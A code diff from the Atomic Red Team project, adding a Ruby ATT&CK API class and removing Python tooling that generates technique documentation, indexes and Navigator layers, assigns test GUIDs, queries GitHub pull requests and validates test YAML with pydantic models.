self._techniques = techniques
return self._techniques
@property
def techniques_by_id(self) -> dict[str, dict]:
if self._techniques_by_id is None:
self._techniques_by_id = {
tid: t
for t in self.techniques
if (tid := _attack_id(t)) is not None
}
return self._techniques_by_id
def _attack_id(technique: dict) -> str | None:
"""Return the ATT&CK ID (e.g. 'T1059.001') for a technique dict, or None."""
for ref in technique.get("external_references", []):
if ref.get("source_name") == "mitre-attack":
return ref["external_id"].upper()
return None
def _matches_platform(platform: str, only_platform: PlatformFilter) -> bool:
# Normalize STIX platform names ("Azure AD" -> "azure-ad", "IaaS" -> "iaas") so
# they match the hyphenated YAML platform strings used as filters.
normalized = platform.lower().replace(" ", "-")
if isinstance(only_platform, str):
# Also match in the other direction so "iaas" matches filter "iaas:gcp".
return (
re.search(only_platform, normalized) is not None
or re.search(re.escape(normalized), only_platform) is not None
)
return only_platform.search(normalized) is not None
+113
View File
@@ -0,0 +1,113 @@
require 'open-uri'
require 'json'
#
# Attack is an API class that loads information about ATT&CK techniques from MITRE'S ATT&CK
# STIX representation. It makes it very simple to do common things with ATT&CK.
#
class Attack
#
# Tactics as presented in the order that the ATT&CK matrics uses
#
def ordered_tactics
[
'initial-access',
'execution',
'persistence',
'privilege-escalation',
'defense-evasion',
'credential-access',
'discovery',
'lateral-movement',
'collection',
'exfiltration',
'command-and-control',
]
end
#
# Returns the technique identifier (T1234) for a Technique object
#
def technique_identifier_for_technique(technique)
technique.fetch('external_references', []).find do |refs|
refs['source_name'] == 'mitre-attack'
end['external_id'].upcase
end
#
# Returns a Technique object given a technique identifier (T1234)
#
def technique_info(technique_id)
techniques.find do |item|
item.fetch('external_references', []).find do |references|
references['external_id'] == technique_id.upcase
end
end
end
#
# Returns the ATT&CK Matrix as a 2D array, in order by `ordered_tactics`
#
def ordered_tactic_to_technique_matrix(only_platform: /.*/)
all_techniques = techniques_by_tactic(only_platform: only_platform)
# make an 2d array of our techniques in the order our tactics appear
all_techniques_in_tactic_order = []
ordered_tactics.each do |tactic|
all_techniques_in_tactic_order << all_techniques[tactic]
end
# figure out the max number of techniques any one tactic has
max_techniques = all_techniques_in_tactic_order.collect(&:count).max
# extend each array of techniques to that length
all_techniques_in_tactic_order.each {|techniques| techniques.concat(Array.new(max_techniques - techniques.count, nil))}
# transpose to give us the data in columnar format
all_techniques_in_tactic_order.transpose
end
#
# Returns a map of all [ ATT&CK Tactic name ] => [ List of ATT&CK techniques associated with that tactic]
#
def techniques_by_tactic(only_platform: /.*/)
techniques_by_tactic = Hash.new {|h, k| h[k] = []}
techniques.each do |technique|
next unless technique['x_mitre_platforms'].any? {|platform| platform.downcase =~ only_platform}
technique.fetch('kill_chain_phases', []).select {|phase| phase['kill_chain_name'] == 'mitre-attack'}.each do |tactic|
techniques_by_tactic[tactic.fetch('phase_name')] << technique
end
end
techniques_by_tactic
end
#
# Returns a list of all ATT&CK techniques
#
def techniques
# pull out the attack pattern objects
attack_stix.fetch("objects").select do |item|
item.fetch('type') == 'attack-pattern' && item.fetch('external_references', []).select do |references|
references['source_name'] == 'mitre-attack'
end
end
end
private
#
# Returns the complete ATT&CK STIX collection parsed into a Hash
#
def attack_stix
@attack_stix ||= begin
# load the full attack library
local_attack_json_to_try = "#{File.dirname(__FILE__)}/enterprise-attack.json"
if File.exists? local_attack_json_to_try
JSON.parse File.read(local_attack_json_to_try)
else
JSON.parse open('https://raw.githubusercontent.com/mitre/cti/master/enterprise-attack/enterprise-attack.json').read
end
end
end
end
-5
View File
@@ -1,5 +0,0 @@
from os.path import dirname, realpath
base_path = dirname(dirname(realpath(__file__)))
atomics_path = f"{base_path}/atomics"
used_guids_file = f"{atomics_path}/used_guids.txt"
-580
View File
@@ -1,580 +0,0 @@
import csv
import json
import re
from concurrent.futures import ThreadPoolExecutor, as_completed
from functools import lru_cache
from io import StringIO
from pathlib import Path
from typing import Pattern, get_args
import yaml
from jinja2 import Environment, FileSystemLoader
from atomic_red_team.attack_api import Attack, PlatformFilter, _matches_platform
from atomic_red_team.common import atomics_path, base_path
from atomic_red_team.models import Platform, get_language, get_supported_platform
PLATFORMS: list[str] = list(get_args(Platform))
class AtomicRedTeam:
"""Loads Atomic Red Team YAML files and formats technique links."""
def __init__(
self, atomics_dir: str | Path = atomics_path, attack_api: Attack | None = None
):
self.atomics_dir = Path(atomics_dir)
self.attack_api = attack_api or Attack()
self._atomic_tests: list[dict] | None = None
self._tests_by_id: dict[str, list[dict]] | None = None
@property
def atomic_test_paths(self) -> list[Path]:
return sorted(self.atomics_dir.glob("T*/T*.yaml"))
@property
def atomic_tests(self) -> list[dict]:
if self._atomic_tests is None:
self._atomic_tests = []
for path in self.atomic_test_paths:
atomic_yaml = yaml.load(path.read_text(), Loader=yaml.CSafeLoader)
atomic_yaml["atomic_yaml_path"] = str(path)
self._atomic_tests.append(atomic_yaml)
return self._atomic_tests
def atomic_tests_for_technique(
self, technique_or_identifier: dict | str
) -> list[dict]:
if self._tests_by_id is None:
self._tests_by_id = {
atomic["attack_technique"].upper(): atomic.get("atomic_tests", [])
for atomic in self.atomic_tests
}
technique_identifier = self._technique_identifier(technique_or_identifier)
return self._tests_by_id.get(technique_identifier.upper(), [])
def atomic_tests_for_technique_by_platform(
self,
technique_or_identifier: dict | str,
platform: str,
) -> list[dict]:
tests = self.atomic_tests_for_technique(technique_or_identifier)
return [
test for test in tests if platform in test.get("supported_platforms", [])
]
def github_link_to_technique(
self,
technique: dict,
include_identifier: bool = False,
only_platform: PlatformFilter = ".*",
) -> str:
technique_identifier = self.attack_api.technique_identifier_for_technique(
technique
).upper()
link_display = (
f"{technique_identifier} {technique['name']}"
if include_identifier
else technique["name"]
)
yaml_file = (
self.atomics_dir / technique_identifier / f"{technique_identifier}.yaml"
)
markdown_file = (
self.atomics_dir / technique_identifier / f"{technique_identifier}.md"
)
if (
self.atomic_yaml_has_test_for_platform(yaml_file, only_platform)
and markdown_file.exists()
):
return f"[{link_display}](../../{technique_identifier}/{technique_identifier}.md)"
return f"{link_display} [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)"
def atomic_yaml_has_test_for_platform(
self,
yaml_file: Path,
only_platform: PlatformFilter,
) -> bool:
if not yaml_file.exists():
return False
atomic_yaml = yaml.load(yaml_file.read_text(), Loader=yaml.CSafeLoader)
return any(
_matches_platform(platform, only_platform)
for atomic in atomic_yaml.get("atomic_tests", [])
for platform in atomic.get("supported_platforms", [])
)
def _technique_identifier(self, technique_or_identifier: dict | str) -> str:
if isinstance(technique_or_identifier, dict):
return self.attack_api.technique_identifier_for_technique(
technique_or_identifier
)
return technique_or_identifier
class AtomicRedTeamDocs:
"""Generates Atomic Red Team markdown, CSV, YAML, and Navigator indexes."""
def __init__(
self,
base_dir: str | Path = base_path,
attack_file: str | Path | None = None,
atomic_red_team: AtomicRedTeam | None = None,
):
self.base_dir = Path(base_dir)
self.attack_api = Attack(attack_file)
self.atomic_red_team = atomic_red_team or AtomicRedTeam(
self.base_dir / "atomics",
self.attack_api,
)
def generate_all_the_docs(self) -> tuple[list[str], list[str]]:
# Pre-warm all caches on the main thread before handing off to workers.
# atomic_tests loads all YAML; _tests_by_id builds the lookup dict;
# techniques_by_id is used by generate_technique_docs per technique.
_ = self.atomic_red_team.atomic_tests
_ = self.attack_api.techniques_by_id
def _render_one(atomic_yaml: dict) -> tuple[str, str, str]:
output_path = Path(atomic_yaml["atomic_yaml_path"]).with_suffix(".md")
try:
self.generate_technique_docs(atomic_yaml, output_path)
return ("ok", atomic_yaml["atomic_yaml_path"], str(output_path))
except Exception as ex:
return ("fail", atomic_yaml["atomic_yaml_path"], str(ex))
oks: list[str] = []
fails: list[str] = []
with ThreadPoolExecutor() as executor:
futures = [
executor.submit(_render_one, ay)
for ay in self.atomic_red_team.atomic_tests
]
for future in as_completed(futures):
status, src_path, detail = future.result()
if status == "ok":
print(f"Generating docs for {src_path} => {detail} => OK")
oks.append(src_path)
else:
print(f"Generating docs for {src_path} FAIL\n{detail}")
fails.append(src_path)
print()
print(f"Generated docs for {len(oks)} techniques, {len(fails)} failures")
self.generate_indexes()
return oks, fails
def generate_technique_docs(
self, atomic_yaml: dict, output_doc_path: str | Path
) -> None:
technique = self.attack_api.technique_info(atomic_yaml["attack_technique"])
if technique is None:
raise ValueError(
f"Unknown ATT&CK technique {atomic_yaml['attack_technique']}"
)
technique = {**technique, "identifier": atomic_yaml["attack_technique"].upper()}
output_doc_path = Path(output_doc_path)
output_doc_path.write_text(_render_technique_markdown(technique, atomic_yaml))
def generate_indexes(self) -> None:
index_dir = self.base_dir / "atomics" / "Indexes"
for subdir in (
"Matrices",
"Indexes-Markdown",
"Indexes-CSV",
"Attack-Navigator-Layers",
):
(index_dir / subdir).mkdir(parents=True, exist_ok=True)
self.generate_attack_matrix("All", index_dir / "Matrices" / "matrix.md")
for title, platform, filename in _platform_outputs("matrix.md"):
self.generate_attack_matrix(
title, index_dir / "Matrices" / filename, platform
)
self.generate_index("All", index_dir / "Indexes-Markdown" / "index.md")
for title, platform, filename in _platform_outputs("index.md"):
# Use ".*" for attack_platform so STIX v19 platform renames don't break
# cloud-platform indexes; rely on YAML supported_platforms for filtering.
self.generate_index(
title, index_dir / "Indexes-Markdown" / filename, platform
)
self.generate_index_csv(index_dir / "Indexes-CSV" / "index.csv")
for title, platform, filename in _platform_outputs("index.csv"):
self.generate_index_csv(index_dir / "Indexes-CSV" / filename, platform)
self.generate_yaml_index(index_dir / "index.yaml")
for platform in PLATFORMS:
self.generate_yaml_index_by_platform(
index_dir / f"{platform.replace(':', '_')}-index.yaml",
platform,
)
self.generate_navigator_layers(index_dir / "Attack-Navigator-Layers")
def generate_attack_matrix(
self,
title_prefix: str,
output_doc_path: str | Path,
only_platform: PlatformFilter = ".*",
) -> None:
rows = [f"# {title_prefix} Atomic Tests by ATT&CK Tactic & Technique\n"]
tactics = self.attack_api.ordered_tactics()
rows.append(f"| {' | '.join(tactics)} |\n")
rows.append(f"|{'-----|' * len(tactics)}\n")
for row_of_techniques in self.attack_api.ordered_tactic_to_technique_matrix(
only_platform
):
row = [
self.atomic_red_team.github_link_to_technique(
technique, only_platform=only_platform
)
if technique
else ""
for technique in row_of_techniques
]
rows.append(f"| {' | '.join(row)} |\n")
Path(output_doc_path).write_text("".join(rows))
def generate_index(
self,
title_prefix: str,
output_doc_path: str | Path,
only_platform: PlatformFilter = ".*",
attack_platform: PlatformFilter = ".*",
) -> None:
rows = [f"# {title_prefix} Atomic Tests by ATT&CK Tactic & Technique\n"]
by_tactic = self.attack_api.techniques_by_tactic(attack_platform)
for tactic in self.attack_api.ordered_tactics():
techniques = sorted(
by_tactic.get(tactic, []),
key=lambda t: _technique_sort_key(
self.attack_api.technique_identifier_for_technique(t)
),
)
if not techniques:
continue
# For platform-specific indexes exclude techniques with no tests on that platform.
if only_platform != ".*":
techniques = [
t for t in techniques
if any(
_matches_platform(platform, only_platform)
for test in self.atomic_red_team.atomic_tests_for_technique(t)
for platform in test.get("supported_platforms", [])
)
]
if not techniques:
continue
rows.append(f"# {tactic}\n")
for technique in techniques:
rows.append(
f"- {self.atomic_red_team.github_link_to_technique(technique, True, only_platform)}\n"
)
tests = self.atomic_red_team.atomic_tests_for_technique(technique)
for index, atomic_test in enumerate(tests, start=1):
platforms = atomic_test.get("supported_platforms", [])
if any(
_matches_platform(platform, only_platform)
for platform in platforms
):
rows.append(
f" - Atomic Test #{index}: {atomic_test['name']} [{', '.join(platforms)}]\n"
)
rows.append("\n")
Path(output_doc_path).write_text("".join(rows))
def generate_index_csv(
self,
output_doc_path: str | Path,
only_platform: PlatformFilter = ".*",
attack_platform: PlatformFilter = ".*",
) -> None:
output = StringIO()
writer = csv.writer(output, lineterminator="\n")
writer.writerow(
[
"Tactic",
"Technique #",
"Technique Name",
"Test #",
"Test Name",
"Test GUID",
"Executor Name",
]
)
by_tactic = self.attack_api.techniques_by_tactic(attack_platform)
for tactic in self.attack_api.ordered_tactics():
techniques = sorted(
by_tactic.get(tactic, []),
key=lambda t: _technique_sort_key(
self.attack_api.technique_identifier_for_technique(t)
),
)
for technique in techniques:
tests = self.atomic_red_team.atomic_tests_for_technique(technique)
for index, atomic_test in enumerate(tests, start=1):
if any(
_matches_platform(platform, only_platform)
for platform in atomic_test.get("supported_platforms", [])
):
writer.writerow(
[
tactic,
technique["external_references"][0]["external_id"],
technique["name"],
index,
atomic_test["name"],
atomic_test.get("auto_generated_guid", ""),
atomic_test["executor"]["name"],
]
)
Path(output_doc_path).write_text(output.getvalue())
def generate_yaml_index(self, output_doc_path: str | Path) -> None:
result = self._yaml_index()
Path(output_doc_path).write_text(
yaml.dump(
json.loads(json.dumps(result)),
Dumper=yaml.CSafeDumper,
sort_keys=False,
allow_unicode=True,
)
)
def generate_yaml_index_by_platform(
self, output_doc_path: str | Path, platform: str
) -> None:
result = self._yaml_index(platform)
Path(output_doc_path).write_text(
yaml.dump(
json.loads(json.dumps(result)),
Dumper=yaml.CSafeDumper,
sort_keys=False,
allow_unicode=True,
)
)
def generate_navigator_layers(self, output_dir: str | Path) -> None:
output_dir = Path(output_dir)
layer_specs = [("art-navigator-layer.json", None)]
layer_specs.extend(
(f"art-navigator-layer-{platform.replace(':', '-')}.json", platform)
for platform in PLATFORMS
)
for filename, platform in layer_specs:
layer = _navigator_layer(
techniques=self._navigator_techniques(platform),
layer_name=_layer_name(filename),
platform=platform,
)
(output_dir / filename).write_text(
json.dumps(layer, separators=(",", ":")), encoding="utf-8"
)
def _yaml_index(self, platform: str | None = None) -> dict:
result = {}
for tactic, techniques in self.attack_api.techniques_by_tactic().items():
result[tactic] = {}
for technique in techniques:
identifier = technique["external_references"][0]["external_id"]
tests = self.atomic_red_team.atomic_tests_for_technique(technique)
if platform:
tests = [
test
for test in tests
if platform in test.get("supported_platforms", [])
]
result[tactic][identifier] = {
"technique": technique,
"atomic_tests": tests,
}
return result
def _navigator_techniques(self, platform: str | None = None) -> list[dict]:
entries: dict[str, dict] = {}
parent_scores: dict[str, int] = {}
for atomic_yaml in self.atomic_red_team.atomic_tests:
tests = atomic_yaml.get("atomic_tests", [])
if platform:
tests = [
test
for test in tests
if platform in test.get("supported_platforms", [])
]
if not tests:
continue
technique_id = atomic_yaml["attack_technique"]
entry: dict = {
"techniqueID": technique_id,
"score": len(tests),
"enabled": True,
}
if platform is not None:
entry["comment"] = "\n" + "".join(
f"- {t['name']}\n" for t in tests
)
entry["links"] = [{"label": "View Atomic", "url": _atomic_url(technique_id)}]
entries[technique_id] = entry
if "." in technique_id:
parent_id = technique_id.split(".")[0]
parent_scores[parent_id] = parent_scores.get(parent_id, 0) + len(tests)
for parent_id, score in parent_scores.items():
if parent_id in entries:
entries[parent_id]["score"] += score
else:
entries[parent_id] = {
"techniqueID": parent_id,
"score": score,
"enabled": True,
"links": [{"label": "View Atomic", "url": _atomic_url(parent_id)}],
}
return list(entries.values())
@lru_cache(maxsize=None)
def _get_template():
environment = Environment(
autoescape=False,
keep_trailing_newline=True,
loader=FileSystemLoader(Path(__file__).parent),
)
environment.filters.update(
{
"anchor": _anchor,
"attack_url_identifier": lambda value: str(value).replace(".", "/"),
"cleanup": _cleanup,
"language": get_language,
"platform_list": _platform_list,
}
)
return environment.get_template("atomic_doc_template.md.j2")
def _render_technique_markdown(technique: dict, atomic_yaml: dict) -> str:
template = _get_template()
technique = {
**technique,
"name": atomic_yaml.get("display_name", technique["name"]),
}
return template.render(
atomic_yaml=atomic_yaml,
attack_description_lines=_attack_description_lines(technique),
technique=technique,
)
def _attack_description_lines(technique: dict) -> list[str]:
description = technique.get("description", "").replace("%\\<", "%<")
description = re.sub(
r"<code>.*?</code>",
lambda match: match.group(0).replace("~", r"\~"),
description,
)
return description.splitlines()
def _platform_list(platforms: list[str]) -> str:
return ", ".join(get_supported_platform(platform) for platform in platforms)
def _cleanup(value: object) -> str:
return str(value or "").strip().replace("\\", "&#92;")
def _anchor(title: str) -> str:
return re.sub(
r"[`~!@#$%^&*()+=<>?,./:;\"'|{}\[\]\\–—]", "", title.lower().replace(" ", "-")
)
_PLATFORM_TITLES: dict[str, str] = {
"windows": "Windows",
"macos": "macOS",
"linux": "Linux",
"office-365": "Office 365",
"azure-ad": "Azure AD",
"google-workspace": "Google Workspace",
"saas": "SaaS",
"iaas": "IaaS",
"containers": "Containers",
"iaas:gcp": "IaaS:GCP",
"iaas:azure": "IaaS:Azure",
"iaas:aws": "IaaS:AWS",
"esxi": "ESXi",
}
# Platforms whose filename prefix differs from their identifier (e.g. colon is invalid).
_PLATFORM_FILENAME_PREFIX: dict[str, str] = {
"iaas:gcp": "gcp",
"iaas:azure": "azure",
"iaas:aws": "aws",
}
def _platform_outputs(suffix: str) -> list[tuple[str, str, str]]:
return [
(
_PLATFORM_TITLES.get(p, p),
p,
f"{_PLATFORM_FILENAME_PREFIX.get(p, p)}-{suffix}",
)
for p in PLATFORMS
]
def _atomic_url(technique_id: str) -> str:
return f"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/{technique_id}/{technique_id}.md"
def _navigator_layer(
techniques: list[dict], layer_name: str, platform: str | None = None
) -> dict:
filters: dict = {}
if platform in ("windows", "macos", "linux"):
filters = {
"platforms": [
platform.replace("macos", "macOS")
.replace("windows", "Windows")
.replace("linux", "Linux")
]
}
return {
"name": layer_name,
"versions": {"attack": "19", "navigator": "5.3.0", "layer": "4.5"},
"description": f"{layer_name} MITRE ATT&CK Navigator Layer",
"domain": "enterprise-attack",
"filters": filters,
"gradient": {"colors": ["#ffffff", "#ce232e"], "minValue": 0, "maxValue": 10},
"legendItems": [
{"label": "10 or more tests", "color": "#ce232e"},
{"label": "1 or more tests", "color": "#ffffff"},
],
"techniques": techniques,
}
def _technique_sort_key(technique_id: str) -> tuple[int, ...]:
"""Return a sort key that orders T1001 < T1001.001 < T1001.002 < T1002."""
parts = technique_id.lstrip("Tt").split(".")
return tuple(int(p) for p in parts)
def _layer_name(filename: str) -> str:
if filename == "art-navigator-layer.json":
return "Atomic Red Team"
platform = filename.removeprefix("art-navigator-layer-").removesuffix(".json")
names = {
"windows": "Windows",
"macos": "macOS",
"linux": "Linux",
"iaas": "Iaas",
"iaas-aws": "Iaas:AWS",
"iaas-azure": "Iaas:Azure",
"iaas-gcp": "Iaas:GCP",
"containers": "Containers",
"saas": "SaaS",
"google-workspace": "Google-Workspace",
"azure-ad": "Azure-AD",
"office-365": "Office-365",
"esxi": "ESXi",
}
return f"Atomic Red Team ({names.get(platform, platform)})"
File diff suppressed because one or more lines are too long
-45
View File
@@ -1,45 +0,0 @@
import re
import uuid
from typing import List
from ruamel.yaml import YAML
from atomic_red_team.common import used_guids_file
yaml = YAML(typ="safe")
def get_unique_guid(guids: List[str]):
# This function should return a unique GUID that's not in the used_guids_file.
guid = str(uuid.uuid4())
if guid not in guids:
with open(used_guids_file, "a") as f: # append mode
f.write(f"{guid}\n")
return guid
else:
return get_unique_guid(guids)
def generate_guids_for_yaml(path, get_guid):
with open(path, "r") as file:
og_text = file.read()
# Add the "auto_generated_guid:" element after the "- name:" element if it isn't already there
text = re.sub(
r"(?i)(^([ \t]*-[ \t]*)name:.*$(?!\s*auto_generated_guid))",
lambda m: f"{m.group(1)}\n{m.group(2).replace('-', ' ')}auto_generated_guid:",
og_text,
flags=re.MULTILINE,
)
# Fill the "auto_generated_guid:" element in if it doesn't contain a guid
text = re.sub(
r"(?i)^([ \t]*auto_generated_guid:)(?!([ \t]*[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12})).*$",
lambda m: f"{m.group(1)} {get_guid()}",
text,
flags=re.MULTILINE,
)
if text != og_text:
with open(path, "wb") as file:
# using wb mode instead of w. If not, the end of line characters are auto-converted to OS specific ones.
file.write(text.encode())
-165
View File
@@ -1,165 +0,0 @@
import fnmatch
import json
import os
import re
from dataclasses import dataclass
import requests
import yaml
from yaml.loader import SafeLoader
def get_technique_from_filename(filename):
"""Returns technique(Txxx.xxx) from the filename specified"""
return re.findall(r"T[.\d]{4,8}", filename)[0]
@dataclass
class ChangedAtomic:
"""Returns atomic technique with test number which can be later used to run atomics in CI/CD pipelines."""
technique: str
test_number: int
data: dict
class SafeLineLoader(SafeLoader):
def construct_mapping(self, node, deep=False):
"""Add line number to each block of the atomic test."""
mapping = super(SafeLineLoader, self).construct_mapping(node, deep=deep)
# Add 1 so line numbering starts at 1
mapping["__line__"] = node.start_mark.line + 1
return mapping
class GithubAPI:
labels = {
"windows": "windows",
"macos": "macOS",
"linux": "linux",
"azure-ad": "ADFS",
"containers": "containers",
"iaas:gcp": "cloud",
"iaas:aws": "cloud",
"iaas:azure": "cloud",
"office-365": "cloud",
"google-workspace": "cloud",
}
maintainers = {
"windows": ["clr2of8", "MHaggis", "cyberbuff"],
"linux": ["josehelps", "cyberbuff"],
"macos": ["josehelps", "cyberbuff"],
"containers": ["patel-bhavin"],
"iaas:gcp": ["patel-bhavin"],
"iaas:aws": ["patel-bhavin"],
"iaas:azure": ["patel-bhavin"],
"azure-ad": ["patel-bhavin"],
"google-workspace": ["patel-bhavin"],
"office-365": ["patel-bhavin"],
}
def __init__(self, token):
self.token = token
@property
def headers(self):
return {
"Authorization": f"Bearer {self.token}",
"X-GitHub-Api-Version": "2022-11-28",
"Accept": "application/vnd.github+json",
}
def get_atomic_with_lines(self, file_url: str):
"""Get Atomic Technique along with line number for each of the atomics."""
r = requests.get(file_url, headers=self.headers)
assert r.status_code == 200
return yaml.load(r.text, Loader=SafeLineLoader)
def get_files_for_pr(self, pr):
"""Get new and modified files in the `atomics` directory changed in a PR."""
response = requests.get(
f"https://api.github.com/repos/{os.getenv('GITHUB_REPOSITORY')}/pulls/{pr}/files",
headers=self.headers,
timeout=15,
)
assert response.status_code == 200
files = response.json()
return filter(
lambda x: (
x["status"] in ["added", "modified"]
and fnmatch.fnmatch(x["filename"], "atomics/T*/T*.yaml")
),
files,
)
def get_tests_changed(self, pr: str):
"""Get all the tests changed in a PR"""
tests = []
start = 0
files = self.get_files_for_pr(pr)
for file in files:
data = self.get_atomic_with_lines(file["raw_url"])
technique = get_technique_from_filename(file["filename"])
if file["status"] == "added":
# New file; run the entire technique; Invoke-AtomicTest Txxxx
tests += [
ChangedAtomic(technique=technique, test_number=index + 1, data=t)
for index, t in enumerate(data["atomic_tests"])
]
else:
changed_lines = []
count = 0
for line in file["patch"].split("\n"):
if line.startswith("@@"):
x, y = re.findall(r"\d{1,3},\d{1,3}", line)
start = int(x.split(",")[0])
count = -1
elif line.startswith("+"): # only take count of added lines
changed_lines.append(start + count)
elif line.startswith("-"):
count -= 1
count += 1
atomics = data["atomic_tests"]
for index, t in enumerate(atomics):
curr_atomic_start = atomics[index]["__line__"]
if index + 1 < len(atomics):
curr_atomic_end = atomics[index + 1]["__line__"]
else:
curr_atomic_end = start + 60
changes_in_current_atomic = [
i
for i in changed_lines
if i > curr_atomic_start and i < curr_atomic_end
]
if len(changes_in_current_atomic) > 0:
tests.append(
ChangedAtomic(
technique=technique, test_number=index + 1, data=t
)
)
return tests
def save_labels_and_maintainers(self, pr):
"""Saves labels and maintainers into `pr/labels.json` which would be later used by a workflow run."""
tests = self.get_tests_changed(pr)
platforms = set()
for t in tests:
platforms.update(t.data["supported_platforms"])
labels = []
maintainers = []
for p in platforms:
if p in self.labels:
labels.append(self.labels[p])
if p in self.maintainers:
maintainers += self.maintainers[p]
os.mkdir("pr")
with open("pr/changedfiles.json", "w") as f:
x = [{"name": t.technique, "test_number": t.test_number} for t in tests]
f.write(json.dumps(x))
with open("pr/labels.json", "w") as f:
j = {"pr": pr, "labels": labels, "maintainers": maintainers}
f.write(json.dumps(j))
-270
View File
@@ -1,270 +0,0 @@
import re
from functools import reduce
from typing import Dict, List, Literal, Optional, Union
from uuid import UUID
from pydantic import (
AnyUrl,
BaseModel,
ConfigDict,
Field,
IPvAnyAddress,
StrictFloat,
StringConstraints,
conlist,
constr,
field_serializer,
field_validator,
model_validator,
)
from pydantic_core import PydanticCustomError
from pydantic_core.core_schema import ValidationInfo
from typing_extensions import Annotated, TypedDict
InputArgType = Literal["url", "string", "float", "integer", "path"]
Platform = Literal[
"windows",
"macos",
"linux",
"office-365",
"azure-ad",
"google-workspace",
"saas",
"iaas",
"containers",
"iaas:gcp",
"iaas:azure",
"iaas:aws",
"esxi",
]
ExecutorType = Literal["manual", "powershell", "sh", "bash", "command_prompt"]
DomainName = Annotated[
str,
StringConstraints(
pattern=r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z0-9][a-z0-9-]{0,61}[a-z0-9]$"
),
]
AttackTechniqueID = Annotated[
str, StringConstraints(pattern=r"T\d{4}(?:\.\d{3})?", min_length=5)
]
def extract_mustached_keys(commands: List[Optional[str]]) -> List[str]:
result = []
for command in commands:
if command:
matches = re.finditer(r"#{(.*?)}", command, re.MULTILINE)
keys = [list(i.groups()) for i in matches]
keys = list(reduce(lambda x, y: x + y, keys, []))
result.extend(keys)
return list(set(result))
def get_supported_platform(platform: Platform):
platforms = {
"macos": "macOS",
"office-365": "Office 365",
"windows": "Windows",
"linux": "Linux",
"azure-ad": "Azure AD",
"iaas": "IaaS",
"saas": "SaaS",
"iaas:aws": "AWS",
"iaas:azure": "Azure",
"iaas:gcp": "GCP",
"google-workspace": "Google Workspace",
"containers": "Containers",
"esxi": "ESXi",
}
return platforms[platform]
def get_language(executor: ExecutorType):
if executor == "command_prompt":
return "cmd"
elif executor == "manual":
return ""
return executor
class BaseArgument(TypedDict):
description: str
class UrlArg(BaseArgument):
default: Optional[DomainName | AnyUrl | IPvAnyAddress]
type: Literal["url", "Url"]
@field_serializer("default")
def serialize_url(self, value):
return str(value)
class StringArg(BaseArgument):
default: Optional[str]
type: Literal["string", "path", "String", "Path"]
class IntArg(BaseArgument):
default: Optional[int]
type: Literal["integer", "Integer"]
class FloatArg(BaseArgument):
default: Optional[StrictFloat]
type: Literal["float", "Float"]
Argument = Annotated[
Union[FloatArg, IntArg, UrlArg, StringArg], Field(discriminator="type")
]
class StrictModel(BaseModel):
model_config = ConfigDict(
validate_default=True, extra="forbid", validate_assignment=True
)
class Executor(StrictModel):
name: ExecutorType
elevation_required: bool = False
class ManualExecutor(Executor):
name: Literal["manual"]
steps: str = Field(..., min_length=10)
class CommandExecutor(Executor):
name: Literal["powershell", "sh", "bash", "command_prompt"]
command: constr(min_length=1)
cleanup_command: Optional[str] = None
class Dependency(StrictModel):
description: constr(min_length=1)
prereq_command: constr(min_length=1)
get_prereq_command: Optional[str]
class Atomic(StrictModel):
test_number: Optional[str] = None
name: constr(min_length=1)
description: constr(min_length=1)
supported_platforms: conlist(Platform, min_length=1)
executor: Union[ManualExecutor, CommandExecutor] = Field(..., discriminator="name")
dependencies: Optional[List[Dependency]] = []
input_arguments: Dict[constr(min_length=2, pattern=r"^[\w_-]+$"), Argument] = {}
dependency_executor_name: Optional[ExecutorType] = None
auto_generated_guid: Optional[UUID] = None
@classmethod
def extract_mustached_keys(cls, value: dict) -> List[str]:
commands = []
executor = value.get("executor")
if isinstance(executor, CommandExecutor):
commands = [executor.command, executor.cleanup_command]
if isinstance(executor, ManualExecutor):
commands = [executor.steps]
for d in value.get("dependencies") or []:
commands.extend([d.get_prereq_command, d.prereq_command])
return extract_mustached_keys(commands)
@field_validator("dependency_executor_name", mode="before") # noqa
@classmethod
def validate_dep_executor(cls, v, info: ValidationInfo):
if v is not None and info.data.get("dependencies") == []:
raise PydanticCustomError(
"invalid_dependency_executor_name",
"'dependency_executor_name' is not needed if there are no dependencies. Remove the key from YAML",
{"loc": ["dependency_executor_name"], "input": None},
)
return v
@model_validator(mode="after")
def validate_elevation_required(self):
if (
("linux" in self.supported_platforms or "macos" in self.supported_platforms)
and not self.executor.elevation_required
and isinstance(self.executor, CommandExecutor)
):
commands = [self.executor.command]
if self.executor.cleanup_command:
commands.append(self.executor.cleanup_command)
if any(["sudo" in cmd for cmd in commands]):
raise PydanticCustomError(
"elevation_required_but_not_provided",
"'elevation_required' shouldn't be empty/false. Since `sudo` is used, set `elevation_required` to true`",
{
"loc": ["executor", "elevation_required"],
"input": self.executor.elevation_required,
},
)
return self
@field_validator("input_arguments", mode="before") # noqa
@classmethod
def validate(cls, v, info: ValidationInfo):
if v is None:
raise PydanticCustomError(
"empty_input_arguments",
"'input_arguments' shouldn't be empty. Provide a valid value or remove the key from YAML",
{"loc": ["input_arguments"], "input": None},
)
atomic = info.data
keys = cls.extract_mustached_keys(atomic)
for key, _value in v.items():
if key not in keys:
raise PydanticCustomError(
"unused_input_argument",
f"'{key}' is not used in any of the commands",
{"loc": ["input_arguments", key], "input": key},
)
else:
keys.remove(key)
if len(keys) > 0:
for x in keys:
raise PydanticCustomError(
"missing_input_argument",
f"{x} is not defined in input_arguments",
{"loc": ["input_arguments"]},
)
return v
class Technique(StrictModel):
attack_technique: AttackTechniqueID
display_name: str = Field(..., min_length=5)
atomic_tests: List[Atomic] = Field(min_length=1)
@model_validator(mode="before")
@classmethod
def validate_dependency_executor_names(cls, data):
"""Check if dependency_executor_name keys are present with empty/None values in atomic tests"""
if isinstance(data, dict) and "atomic_tests" in data:
atomic_tests = data.get("atomic_tests", [])
for i, test in enumerate(atomic_tests):
if isinstance(test, dict) and "dependency_executor_name" in test:
value = test.get("dependency_executor_name")
# If the key exists but value is None or empty string, that's an error
if value is None or value == "":
raise PydanticCustomError(
"empty_dependency_executor_name",
"'dependency_executor_name' shouldn't be empty. Provide a valid value ['manual','powershell', 'sh', "
"'bash', 'command_prompt'] or remove the key from YAML",
{
"loc": ["atomic_tests", i, "dependency_executor_name"],
"input": value,
},
)
return data
